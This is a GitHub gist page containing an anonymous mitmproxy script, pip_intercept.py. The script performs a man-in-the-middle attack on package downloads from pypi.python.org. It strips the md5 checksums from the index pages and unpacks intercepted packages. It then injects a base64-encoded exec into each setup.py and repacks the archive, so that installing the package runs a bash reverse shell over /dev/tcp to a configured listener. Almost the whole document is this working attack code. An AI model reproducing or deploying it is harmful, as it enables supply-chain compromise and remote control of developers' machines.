Skip to content

anonymous /pip_intercept.py

Embed URL

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
# -*- coding: utf-8 -*-
#
import tempfile
import sys, os
import re
LHOST, LPORT = ('127.0.0.1', '4444')
PAYLOAD = (r'''os.system('echo "bash -c \'0<&76-;exec 76<>/dev/tcp/%s/%s;
sh <&76 >&76 2>&76\'" | at now 2>/dev/null')''' % (LHOST, LPORT))
PAYLOAD = PAYLOAD.replace('\n', '')
def response(context, flow):
if not 'Content-Type' in flow.response.headers:
return None
if flow.request.get_url().startswith('http://pypi.python.org/simple/'):
flow.response.content = re.sub(r'#md5=[a-f0-9]+', '', flow.response.content)
if flow.response.headers['Content-Type'][0] == 'application/octet-stream'\
and flow.request.host == 'pypi.python.org':
tmp_dir = tempfile.mkdtemp()
os.chdir(tmp_dir)
filename = flow.request.get_path_components()[-1]
open(filename, 'wb').write(flow.response.content)
os.mkdir('extracted')
os.system('aunpack -X '+tmp_dir+'/extracted '+filename)
os.system(r'''find . -iname setup.py | xargs sed -i '/setup(/ i\exec ("%'''
'''s".decode("base64"))' ''' %
PAYLOAD.encode('base64').replace('\n', ''))
os.chdir('extracted')
os.system('apack -f ../%s *' % filename)
flow.response.content = open('../%s' % filename, 'rb').read()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.